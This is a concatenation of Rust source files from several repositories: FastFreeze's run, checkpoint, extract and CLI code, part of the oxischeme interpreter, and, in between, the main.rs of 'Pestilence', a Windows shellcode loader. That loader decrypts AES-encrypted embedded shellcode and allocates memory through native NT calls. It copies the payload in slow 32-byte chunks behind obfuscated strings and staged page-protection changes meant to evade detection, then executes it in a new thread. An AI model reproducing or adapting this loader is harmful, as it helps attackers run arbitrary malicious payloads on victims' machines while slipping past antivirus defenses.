if std::process::id() > APP_ROOT_PID as u32 { // We should be pid=1 in a container, so this code block only applies when running // outside of a container. set_ns_last_pid(MIN_PID)?; bail!("Current pid is too high. Re-run the same command again."); } Ok(()) } fn do_run( image_url: ImageUrl, app_args: Option<Vec<OsString>>, preserved_paths: HashSet<PathBuf>, tcp_listen_remaps: Vec<String>, passphrase_file: Option<PathBuf>, no_restore: bool, allow_bad_image_version: bool, leave_stopped: bool, ) -> Result<()> { // Holding the `with_checkpoint_restore_lock` lock (done by caller) while // invoking any process (e.g., `criu_check_cmd`) is preferrable to avoid // disturbing another instance of FastFreeze trying to do PID control. criu::criu_check_cmd() .enable_stderr_logging("criu-check") .spawn()? .wait_for_success()?; ensure_non_conflicting_pid()?; // We prepare the store for writes to speed up checkpointing. Notice that // we also prepare the store during restore, because we want to make sure // we can checkpoint after a restore. trace!("Preparing image store"); let store = image_url.store(); store.prepare(true)?; let run_mode = if no_restore { debug!("Running app from scratch (--no-restore)"); RunMode::FromScratch } else { debug!("Fetching image manifest for {}", image_url); determine_run_mode(&*store, allow_bad_image_version) .context(ExitCode(EXIT_CODE_RESTORE_FAILURE))? 
}; match (run_mode, app_args) { (RunMode::Restore { img_manifest }, _) => { let shard_download_cmds = shard::download_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; with_metrics("restore", || restore( image_url, preserved_paths, tcp_listen_remaps, passphrase_file, shard_download_cmds, leave_stopped ).context(ExitCode(EXIT_CODE_RESTORE_FAILURE)), |(stats, duration_since_checkpoint)| json!({ "stats": stats, "duration_since_checkpoint_sec": duration_since_checkpoint.as_secs_f64(), }) )?; } (RunMode::FromScratch, None) => bail!("No application to restore, but running in restore-only mode, aborting"), (RunMode::FromScratch, Some(app_args)) => { let app_args = app_args.into_iter().map(|s| s.into()).collect(); with_metrics("run_from_scratch", || run_from_scratch(image_url, preserved_paths, passphrase_file, app_args), |_| json!({}))?; } } Ok(()) } fn default_image_name(app_args: &[OsString]) -> Result<String> { use std::collections::hash_map::DefaultHasher; use std::hash::{Hash, Hasher}; fn program_name(cmd: &OsString) -> Result<String> { Ok(Path::new(cmd) .file_name().ok_or_else(|| anyhow!("Failed to determine program name from command name. \ Please use `--image-url` to specify the image URL"))? .to_string_lossy().into_owned()) } Ok(match app_args { [] => unreachable!(), [app_name] => program_name(app_name)?, _ => { let hash = { let mut hasher = DefaultHasher::new(); app_args.hash(&mut hasher); hasher.finish() }; format!("{}-{:04x}", program_name(&app_args[0])?, hash & 0xFFFF) } }) } impl super::CLI for Run { fn run(self) -> Result<()> { let inner = || -> Result<()> { let Self { image_url, app_args, on_app_ready_cmd, no_restore, allow_bad_image_version, passphrase_file, preserved_paths, tcp_listen_remap, leave_stopped, verbose: _, app_name, no_container } = self; // We allow app_args to be empty. This indicates a restore-only mode. 
let app_args = if app_args.is_empty() { info!("Running in restore-only mode as no command is given"); None } else { ensure!(!app_args[0].is_empty(), "Empty command given"); Some(app_args) }; let image_url = match (image_url, app_args.as_ref()) { (Some(image_url), _) => image_url, (None, None) => bail!("--image-url is necessary when running in restore-only mode"), (None, Some(app_args)) => { let image_path = DEFAULT_IMAGE_DIR.join(default_image_name(app_args)?); let image_url = format!("file:{}", image_path.display()); info!("image-url is {}", image_url); image_url } }; let image_url = ImageUrl::parse(&image_url)?; let nscaps = container::ns_capabilities()?; // Note: the following may fork a child to enter the new PID namespace, // The parent will be kept running to monitor the child. // The execution continues as the child process. use container::NSCapabilities as Cap; match (app_name, no_container, &nscaps, install::is_ff_installed()?) { (Some(_), true, _, _ ) => bail!("--app-name and --no-container are mutually exclusive"), (_, true, _, false) => bail!("`fastfreeze install` must first be ran"), (Some(name), false, Cap::Full, _) => container::create(&name)?, (None, false, Cap::Full, _) => container::create(image_url.image_name())?, (Some(_), false, _, _) => bail!("--app-name cannot be used as PID namespaces are not available"), (None, false, Cap::MountOnly, false) => container::create_without_pid_ns()?, (None, false, Cap::None, false) => bail!("`fastfreeze install` must first be ran \ as namespaces are not available"), (None, _, _, true) => {}, }; if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } let preserved_paths = preserved_paths.into_iter().collect(); with_checkpoint_restore_lock(|| do_run( image_url, app_args, preserved_paths, tcp_listen_remap, passphrase_file, no_restore, allow_bad_image_version, leave_stopped))?; if let Some(on_app_ready_cmd) = on_app_ready_cmd { // Fire and forget. 
Command::new_shell(&on_app_ready_cmd) .spawn()?; } let app_exit_result = monitor_child(Pid::from_raw(APP_ROOT_PID)); if app_exit_result.is_ok() { info!("Application exited with exit_code=0"); } // The existance of the app config indicates if the app may b // running (see is_app_running()), so it's better to take it out. if let Err(e) = AppConfig::remove() { error!("{}, but it's okay", e); } app_exit_result }; // We use `with_metrics` to log the exit_code of the application and run time duration with_metrics_raw("run", inner, |result| match result { Ok(()) => json!({ "outcome": "success", "exit_code": 0, }), Err(e) => json!({ "outcome": "error", "exit_code": ExitCode::from_error(&e), "error": format!("{:#}", e), }).merge(metrics_error_json(e)) } ) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/checkpoint.rs
src/cli/checkpoint.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ collections::HashSet, path::PathBuf, time::{SystemTime, Duration}, }; use nix::{ poll::{PollFd, PollFlags}, sys::signal, unistd::Pid, }; use structopt::StructOpt; use serde::Serialize; use crate::{ consts::*, store::ImageUrl, container, image::{ImageManifest, CpuBudget, shard, check_passphrase_file_exists}, process::{Command, ProcessExt, ProcessGroup, Stdio}, metrics::{with_metrics, emit_metrics}, util::poll_nointr, image_streamer::{Stats, ImageStreamer}, lock::with_checkpoint_restore_lock, signal::{kill_process_tree, get_proc_state}, criu, filesystem, virt, }; use super::run::AppConfig; /// Perform a checkpoint of the running application #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: FF_METRICS_RECORDER When specified, FastFreeze invokes the specified program to report metrics. The metrics are formatted in JSON and passed as first argument CRIU_OPTS Additional arguments to pass to CRIU, whitespace separated S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin' TAR_CMD Command to tar the file system. 
Defaults to 'tar'" ))] pub struct Checkpoint { /// Image URL, defaults to the value used during the run command #[structopt(short, long)] image_url: Option<String>, /// Dir/file to include in the image in addition to the ones specified during the run command. /// May be specified multiple times. Multiple paths can also be specified colon separated. // require_delimiter is set to avoid clap's non-standard way of accepting lists. #[structopt(long="preserve-path", name="path", require_delimiter=true, value_delimiter=":")] preserved_paths: Vec<PathBuf>, /// Leave application running after checkpoint #[structopt(long)] leave_running: bool, /// Level of parallelism. Split the image in multiple shards. // We use a default of 4 shards to benefit from some parallelism. // It should be set to something related to the number of CPUs available. #[structopt(long, default_value="4")] num_shards: u32, /// Amount of CPU at disposal. Possible values are [low, medium, high]. /// Currently, `low` skips compression, `medium` uses lz4, and /// `high` uses zstd. #[structopt(long, default_value="medium")] cpu_budget: CpuBudget, /// Enable image encryption. This points to a file containing a passphrase /// used to encrypt the image. The passphrase should contain at least 256 bits /// of entropy. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Checkpoint the specified application. See the run command help about /// --app-name for more details. #[structopt()] app_name: Option<String>, } pub fn do_checkpoint(opts: Checkpoint) -> Result<Stats> { let Checkpoint { image_url, num_shards, cpu_budget, passphrase_file, preserved_paths, leave_running, app_name: _, verbose: _, } = opts; // We override TMPDIR with a safe location. The uploader (or metrics CLI) // may create a tmp file (e.g., bash script using here documents). This // would cause tar to fail as it detects changes in /tmp. 
// `NO_PRESERVE_FF_DIR` is excluded from the list of paths to preserve. std::env::set_var("TMPDIR", &*NO_PRESERVE_FF_DIR); let mut preserved_paths: HashSet<_> = preserved_paths.into_iter().collect(); let config = AppConfig::restore()?; // If the image_url is not supplied, we use the one that we stashed during // the run operation. let image_url = ImageUrl::parse(&image_url.unwrap_or(config.image_url))?; // As for preserved_paths, we join all the paths we know of. // There is the downside of not being able to forget a path that was once preserved. // The upside is that is less prone to bugs for users. preserved_paths.extend(config.preserved_paths); // For the passphrase_file, we take the one provided, or the one specified in // a previous operation. This means that once we use encryption, there is no // way to go back to using no encryption. // Note that if the passphrase file is contained in the preserved_paths, // we'll include it. It would be a little odd, but not necessarily harmful. // We won't emit a warning if that's the case. let passphrase_file = passphrase_file.or(config.passphrase_file); if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } // The manifest contains the name of the shards, which are generated at random. // We combine it with the store to generate the shard upload commands. // A shard upload command is of the form: // "lz4 -1 - - | aws s3 cp - s3://bucket/img/XXXXXX.ffs" let img_manifest = ImageManifest::new( num_shards, passphrase_file.is_some(), cpu_budget.into()); let store = image_url.store(); store.prepare(true)?; let shard_upload_cmds = shard::upload_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; // We emit a "checkpoint_start" event to make it easier to track down // containers that vanish during checkpoints. We don't wait for the metrics // process to complete, it would delay checkpointing. 
let _metrics_p_reaper = { let event = json!({"action": "checkpoint_start", "image_url": image_url.to_string()}); emit_metrics(event)?.map(|p| p.reap_on_drop()) }; info!("Checkpointing application to {} ({})", image_url, img_manifest); if let Some(ref passphrase_file) = passphrase_file { info!("Encrypting image with passphrase from file {}", passphrase_file.display()); } // `pgrp` monitors all our child processes. If one fails, the whole group fails let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_capture(num_shards as usize)?; img_streamer.process.join(&mut pgrp); // Spawn the upload processes connected to the image streamer's output for (i, (upload_cmd, shard_pipe)) in shard_upload_cmds.into_iter().zip(img_streamer.shard_pipes).enumerate() { Command::new_shell(&upload_cmd) .stdin(Stdio::from(shard_pipe)) .enable_stderr_logging(format!("upload shard {}", i+1)) .spawn()? .join(&mut pgrp); } // Wait for the imager socket to be ready. img_streamer.progress.wait_for_socket_init()?; // Spawn the CRIU dump process. CRIU sends the image to the image streamer. // CRIU will leave the application in a stopped state when done, // so that we can continue tarring the filesystem. let criu_ps = criu::criu_dump_cmd() .enable_stderr_logging("criu") .spawn()? .join_as_non_killable(&mut pgrp); // From now on, we want to SIGCONT the application if and if only the CRIU // process succeeds. If it failed, it's CRIU's responsability to resume the app. // In the case that CRIU didn't resume the app, it would be unsafe to let // the application run as it might be in an incorrect state (e.g., having // CRIU's parasite still installed). // If the CRIU process succeeded (but the upload streams failed), we still // want to resume the application. 
// Extract certain fields upfront to avoid compile error due to use of // partial values borrowed in the following closure let inherited_resources = config.inherited_resources; let mut img_streamer_progress = img_streamer.progress; let img_streamer_tar_fs_pipe = img_streamer.tar_fs_pipe; let stats = || -> Result<Stats> { // We want to start dumping the file system ASAP, but we must wait for the // application to be stopped by CRIU, otherwise the filesystem might still // be changing under us. We wait for the "checkpoint-start" message from the // streamer progress pipe. // We must also check for the CRIU process, otherwise, we could hang forever while pgrp.try_wait_for_success()? { let mut poll_fds = pgrp.poll_fds(); poll_fds.push(PollFd::new(img_streamer_progress.fd, PollFlags::POLLIN)); let timeout = -1; poll_nointr(&mut poll_fds, timeout)?; // Check if we have something to read on the progress pipe. // unwrap() is safe. We had pushed a value in the vector. let streamer_poll_fd = poll_fds.last().expect("missing streamer poll_fd"); // unwrap() is safe: we assume the kernel returns valid bits in `revents`. if !streamer_poll_fd.revents().expect("revents invalid").is_empty() { img_streamer_progress.wait_for_checkpoint_start()?; break; } } debug!("Checkpoint started, application is frozen"); { // We save the current time of the application so we can resume time // where we left off. The time config file goes on the file system. // We also save the image_url and preserved paths. let app_clock = virt::time::ConfigPath::default().read_current_app_clock()?; ensure!(app_clock >= 0, "Computed app clock is negative: {}ns", app_clock); debug!("App clock: {:.1}s", Duration::from_nanos(app_clock as u64).as_secs_f64()); let config = AppConfig { image_url: image_url.to_string(), preserved_paths: preserved_paths.clone(), passphrase_file, app_clock, // Ideally, we want the clock time once the checkpoint has ended, // but that would be a bit difficult. We could though. 
// It would involve adding the config.json as an external file // into to the streamer (like fs.tar), and stream it at the very end. // For now, we have the time at which the checkpoint started. created_at: SystemTime::now(), inherited_resources, }; config.save()?; } // We dump the filesystem with tar. The stdout of tar connects to // criu-image-streamer, which incorporates the tarball into the checkpoint // image. // Note that CRIU can complete at any time, but it leaves the application in // a stopped state, so the filesystem remains consistent. debug!("Dumping filesystem"); let tar_ps = filesystem::tar_cmd(preserved_paths, img_streamer_tar_fs_pipe.unwrap()) .enable_stderr_logging("tar") .spawn()? .join(&mut pgrp); pgrp.get_mut(tar_ps).wait()?; // wait for tar to finish pgrp.try_wait_for_success()?; // if tar errored, this is where we exit // We print this debug message so that in the logs, we can have a timestamp // to tell us how long it took. Maybe it would be better to have a metric event. debug!("Filesystem dumped. Finishing dumping processes"); // Wait for checkpoint to complete pgrp.wait_for_success()?; let stats = img_streamer_progress.wait_for_stats()?; stats.show(); Ok(stats) }().map_err(|e| { // Something went sideways while checkpointing (reading the file system? // uploading the image?). if pgrp.terminate().is_ok() && pgrp.get_mut(criu_ps).wait().map_or(false, |r| r.success()) { // CRIU finished successfully, but checkpointing failed. // We SIGCONT the application to revert our state as we found it. debug!("Resuming application (checkpoint failed, criu ok)"); let _ = kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGCONT); } else { match get_proc_state(Pid::from_raw(APP_ROOT_PID)) { Ok('T') => { // STOPPED // CRIU failed due to an non-anticipated error. It did not resume // the application. We won't resume the app as it could be corrupted. warn!("CRIU may have failed unexpectedly. 
\ We'll assume the application state is corrupted (e.g., with parasite code)"); warn!("The application has been left SIGSTOP'ed. You may SIGKILL or SIGCONT it"); } Ok(_) => { // CRIU failed (most likely while writing the checkpoint image), // recovered, resumed the application, and bailed. debug!("Application resumed (checkpoint failed, criu failed)"); } Err(_) => warn!("The application state is unavailable, it is probably gone") }} e })?; if leave_running { debug!("Resuming application (leave running)"); kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGCONT) .context("Failed to resume application")?; } else { // We kill the app later, once metrics are emitted. } // At this point, all the shards are written successfully. We can now write // the manifest file to the store. The manifest file existence indicates // whether the image exists, so it must be written at the very end. debug!("Writing image manifest"); img_manifest.persist_to_store(&*store) .with_context(|| format!("Failed to upload image manifest at {}", image_url))?; info!("Checkpoint completed in {:.1}s", START_TIME.elapsed().as_secs_f64()); Ok(stats) } impl super::CLI for Checkpoint { fn run(self) -> Result<()> { container::maybe_nsenter_app(self.app_name.as_ref())?; // Holding the lock while invoking the metrics CLI is preferable to avoid // disturbing another instance trying to do PID control. with_checkpoint_restore_lock(|| { let leave_running = self.leave_running; with_metrics("checkpoint", || do_checkpoint(self), |stats| json!({"stats": stats}))?; // We kill the app after the metrics are emitted. Killing the app // risk terminating the container, preventing metrics from being emitted. if !leave_running { debug!("Killing application"); kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGKILL) .context("Failed to kill application")?; } Ok(()) }) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/extract.rs
src/cli/extract.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::path::PathBuf; use structopt::StructOpt; use serde::Serialize; use crate::{ consts::*, store::ImageUrl, image::{ManifestFetchResult, ImageManifest, shard, check_passphrase_file_exists}, process::{Command, ProcessExt, ProcessGroup, Stdio}, image_streamer::ImageStreamer, }; /// Extract a FastFreeze image to local disk #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin'" ))] pub struct Extract { /// Image URL, which can also be a regular local path image_url: String, /// Output directory where to extract the image. /// Defaults to the last path component of image-url. #[structopt(short, long)] output_dir: Option<PathBuf>, /// Allow restoring of images that don't match the version we expect. #[structopt(long)] allow_bad_image_version: bool, /// Provide a file containing the passphrase to be used for encrypting /// or decrypting the image. For security concerns, using a ramdisk /// like /dev/shm to store the passphrase file is preferable. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Verbosity. 
Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, } pub fn extract_image( shard_download_cmds: Vec<String>, output_dir: PathBuf, ) -> Result<()> { let num_shards = shard_download_cmds.len(); info!("Extracting image from {} shards", num_shards); let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_extract(num_shards, &output_dir)?; img_streamer.process.join(&mut pgrp); for (download_cmd, shard_pipe) in shard_download_cmds.into_iter().zip(img_streamer.shard_pipes) { Command::new_shell(&download_cmd) .stdout(Stdio::from(shard_pipe)) .spawn()? .join(&mut pgrp); } pgrp.wait_for_success()?; let stats = img_streamer.progress.wait_for_stats()?; stats.show(); info!("Image extracted to {}. Took {:.1}s", output_dir.display(), START_TIME.elapsed().as_secs_f64()); Ok(()) } impl super::CLI for Extract { fn run(self) -> Result<()> { let Self { image_url, output_dir, allow_bad_image_version, passphrase_file, verbose: _ } = self; let image_url = ImageUrl::parse(&image_url)?; let store = image_url.store(); store.prepare(false)?; let output_dir = output_dir .unwrap_or_else(|| PathBuf::from(image_url.image_name())); if let Some(ref passphrase_file) = passphrase_file { check_passphrase_file_exists(passphrase_file)?; } debug!("Fetching image manifest for {}", image_url); match ImageManifest::fetch_from_store(&*store, allow_bad_image_version)? { ManifestFetchResult::Some(img_manifest) => { debug!("Image manifest found: {}", img_manifest); let dl_cmds = shard::download_cmds( &img_manifest, passphrase_file.as_ref(), &*store)?; extract_image(dl_cmds, output_dir)?; } ManifestFetchResult::VersionMismatch { fetched, desired } => { bail!("Image manifest found, but has version {} while the expected version is {}. \ You may try again with --allow-bad-image-version", fetched, desired); } ManifestFetchResult::NotFound => { bail!("Image manifest not found"); } } Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/main.rs
src/cli/main.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use structopt::{StructOpt, clap::AppSettings}; use serde::Serialize; use crate::logger; use super::{ CLI, checkpoint::Checkpoint, extract::Extract, install::Install, run::Run, wait::Wait, }; #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt( // When showing --help, we want to keep the order of arguments as we defined, // as opposed to the default alphabetical order. global_setting(AppSettings::DeriveDisplayOrder), // help subcommand is not useful, disable it. global_setting(AppSettings::DisableHelpSubcommand), // subcommand version is not useful, disable it. global_setting(AppSettings::VersionlessSubcommands), )] #[structopt(after_help(" restore-only is achieved by using \ the `run` subcommand without passing the application command-line arguments" ))] pub struct Opts { #[structopt(subcommand)] command: Command, } #[derive(StructOpt, PartialEq, Debug, Serialize)] enum Command { Run(Run), Checkpoint(Checkpoint), Extract(Extract), Wait(Wait), Install(Install), } impl Opts { // It looks a bit silly not to have a global verbose option flag, but if we // use a global flag, then the user _must_ pass --verbose before the // subcommand, which is even more silly. // clap should be better fn verbosity(&self) -> u8 { match self.command { Command::Install(Install { verbose, .. }) | Command::Run(Run { verbose, .. 
}) | Command::Checkpoint(Checkpoint { verbose, .. }) | Command::Extract(Extract { verbose, .. }) | Command::Wait(Wait { verbose, .. }) => verbose, } } fn log_level(&self) -> logger::LevelFilter { match self.verbosity() { 0 => logger::LevelFilter::Info, 1 => logger::LevelFilter::Debug, _ => logger::LevelFilter::Trace, } } fn log_prefix(&self) -> &'static str { match self.command { Command::Install(_) => "install", Command::Run(_) => "run", Command::Checkpoint(_) => "checkpoint", Command::Extract(_) => "extract", Command::Wait(_) => "wait", } } fn use_log_file(&self) -> bool { // Persisting a log file is helpful to carry the history of the // application in the checkpointed image. matches!(self.command, Command::Run(_) | Command::Checkpoint(_) ) } pub fn init_logger(&self) -> Result<()> { logger::init(self.log_level(), self.log_prefix(), self.use_log_file()) } } impl CLI for Opts { fn run(self) -> Result<()> { match self.command { Command::Install(opts) => opts.run(), Command::Run(opts) => opts.run(), Command::Checkpoint(opts) => opts.run(), Command::Extract(opts) => opts.run(), Command::Wait(opts) => opts.run(), } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
cr7pt0pl4gu3/Pestilence
https://github.com/cr7pt0pl4gu3/Pestilence/blob/67d23f30da113b687822405ec7729ab865f107ca/src/main.rs
src/main.rs
use std::env; use aes::{Aes128}; use cfb_mode::Cfb; use cfb_mode::cipher::{NewCipher, AsyncStreamCipher}; use windows::{Win32::System::Memory::*, Win32::System::SystemServices::*}; use ntapi::{ntmmapi::*, ntpsapi::*, ntobapi::*, winapi::ctypes::*}; use obfstr::obfstr; type Aes128Cfb = Cfb<Aes128>; pub struct Injector { shellcode: Vec<u8>, } impl Injector { pub fn new(shellcode: Vec<u8>) -> Injector { Injector { shellcode } } pub fn run_in_current_process(&mut self) { unsafe { let mut protect = PAGE_NOACCESS.0; let mut map_ptr: *mut c_void = std::ptr::null_mut(); // asking for more than needed, because we can afford it let mut sc_len = self.shellcode.len() * 5; NtAllocateVirtualMemory(NtCurrentProcess, &mut map_ptr, 0, &mut sc_len, MEM_COMMIT.0 | MEM_RESERVE.0, protect); custom_sleep(100); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_READWRITE.0, &mut protect); custom_sleep(100); self.copy_nonoverlapping_gradually(map_ptr as *mut u8); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_NOACCESS.0, &mut protect); custom_sleep(100); NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_EXECUTE.0, &mut protect); custom_sleep(100); let mut thread_handle : *mut c_void = std::ptr::null_mut(); NtCreateThreadEx(&mut thread_handle, MAXIMUM_ALLOWED, std::ptr::null_mut(), NtCurrentProcess, map_ptr, std::ptr::null_mut(), 0, 0, 0, 0, std::ptr::null_mut()); NtWaitForSingleObject(thread_handle, 0, std::ptr::null_mut()); } } fn copy_nonoverlapping_gradually(&mut self, map_ptr: *mut u8) { unsafe { let sc_ptr = self.shellcode.as_ptr(); let mut i = 0; while i < self.shellcode.len()+33 { std::ptr::copy_nonoverlapping(sc_ptr.offset(i as isize), map_ptr.offset(i as isize), 32); i += 32; #[cfg(debug_assertions)] if i % 3200 == 0 || i > self.shellcode.len() { println!("{}{}{}{}{}", obfstr!("[+] [total written] ["), i, obfstr!("B/"), self.shellcode.len(), obfstr!("B]")); } custom_sleep(2); } } } } const SHELLCODE_BYTES: 
&[u8] = include_bytes!("../shellcode.enc"); const SHELLCODE_LENGTH: usize = SHELLCODE_BYTES.len(); #[no_mangle] #[link_section = ".text"] static SHELLCODE: [u8; SHELLCODE_LENGTH] = *include_bytes!("../shellcode.enc"); static AES_KEY: [u8; 16] = *include_bytes!("../aes.key"); static AES_IV: [u8; 16] = *include_bytes!("../aes.iv"); fn decrypt_shellcode_stub() -> Vec<u8> { let mut cipher = Aes128Cfb::new_from_slices(&AES_KEY, &AES_IV).unwrap(); let mut buf = SHELLCODE.to_vec(); cipher.decrypt(&mut buf); buf } fn custom_sleep(delay: u8) { for _ in 0..delay { for _ in 0..10 { for _ in 0..10 { for _ in 0..10 { print!("{}", obfstr!("")); } } } } } fn main() { let args: Vec<String> = env::args().collect(); if args[1] == obfstr!("activate") { let mut injector = Injector::new(decrypt_shellcode_stub()); injector.run_in_current_process(); } }
rust
MIT
67d23f30da113b687822405ec7729ab865f107ca
2026-01-04T20:21:17.128549Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/environment.rs
src/environment.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! The implementation of the Scheme environment binding symbols to values. //! //! This is split into two pieces: //! //! 1. The `Environment` associates symbol names with a concrete location where //! the symbol's value can be found at runime. This is static information used //! during the syntactic analysis. //! //! 2. `Activation`s are instances of lexical blocks (either a lambda invocation, //! or the global top level) at runtime. They only contain values and none of the //! metadata mapping names to these values. After syntactic analysis, we only //! deal with activations, and we no longer need the symbols nor the //! `Environment`. use std::collections::{HashMap}; use std::default::{Default}; use std::fmt; use std::hash; use heap::{ArenaPtr, GcThing, Heap, IterGcThing, Rooted, ToGcThing, Trace}; use value::{Value, RootedValue}; /// An `Activation` represents a runtime instance of a lexical block (either a /// lambda or the global top-level). pub struct Activation { /// The parent scope, or `None` if this is the global activation. parent: Option<ActivationPtr>, /// For a lambda with N arguments, the first N slots are those arguments /// respectively. The rest are local definitions. If a slot is `None`, then /// it's variable hasn't been defined yet (but is referenced by something /// and potentially will be defined in the future). 
vals: Vec<Option<Value>>, } impl Activation { /// Extend the given `Activation` with the values supplied, resulting in a /// new `Activation` instance. pub fn extend(heap: &mut Heap, parent: &RootedActivationPtr, values: Vec<RootedValue>) -> RootedActivationPtr { let mut act = heap.allocate_activation(); act.parent = Some(**parent); act.vals = values.into_iter().map(|v| Some(*v)).collect(); return act; } /// Fetch the j'th variable from the i'th lexical activation. /// /// Returns an error when trying to fetch the value of a variable that has /// not yet been defined. pub fn fetch(&self, heap: &mut Heap, i: u32, j: u32) -> Result<RootedValue, ()> { if i == 0 { let jj = j as usize; if jj >= self.vals.len() { return Err(()); } if let Some(val) = self.vals[jj] { return Ok(Rooted::new(heap, val)); } return Err(()); } return self.parent.expect("Activation::fetch: i out of bounds") .fetch(heap, i - 1, j); } /// Set the j'th variable from the i'th lexical activation to the given /// value. /// /// Returns an error when trying to set a variable that has not yet been /// defined. pub fn update(&mut self, i: u32, j: u32, val: &RootedValue) -> Result<(), ()> { if i == 0 { let jj = j as usize; if jj >= self.vals.len() || self.vals[jj].is_none() { return Err(()); } self.vals[jj] = Some(**val); return Ok(()); } return self.parent.expect("Activation::update: i out of bounds") .update(i - 1, j, val); } fn fill_to(&mut self, n: u32) { while self.len() < n + 1 { self.vals.push(None); } } /// Define the j'th variable of this activation to be the given value. 
pub fn define(&mut self, j: u32, val: Value) { self.fill_to(j); self.vals[j as usize] = Some(val); } #[inline] fn len(&self) -> u32 { self.vals.len() as u32 } } impl hash::Hash for Activation { fn hash<H: hash::Hasher>(&self, state: &mut H) { self.parent.hash(state); for v in self.vals.iter() { v.hash(state); } } } impl Default for Activation { fn default() -> Activation { Activation { parent: None, vals: vec!(), } } } impl Trace for Activation { fn trace(&self) -> IterGcThing { let mut results: Vec<GcThing> = self.vals.iter() .filter_map(|v| { if let Some(val) = *v { val.to_gc_thing() } else { None } }) .collect(); if let Some(parent) = self.parent { results.push(GcThing::from_activation_ptr(parent)); } results.into_iter() } } impl fmt::Debug for Activation { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { try!(write!(f, "(activation :length {}\n", self.vals.len())); try!(write!(f, " :parent ")); if let Some(ref p) = self.parent { write!(f, "Some({:?}))", **p) } else { write!(f, "None)") } } } /// A pointer to an `Activation` on the heap. pub type ActivationPtr = ArenaPtr<Activation>; impl ToGcThing for ActivationPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_activation_ptr(*self)) } } /// A rooted pointer to an `Activation` on the heap. pub type RootedActivationPtr = Rooted<ActivationPtr>; /// The `Environment` represents what we know about bindings statically, during /// syntactic analysis. pub struct Environment { /// A hash map for each lexical block we are currently in, which maps from a /// variable name to its position in any activations that get created for /// this block. bindings: Vec<HashMap<String, u32>>, } impl Environment { /// Create a new `Environemnt`. pub fn new() -> Environment { Environment { bindings: vec!(HashMap::new()) } } /// Extend the environment with a new lexical block with the given set of /// variables. 
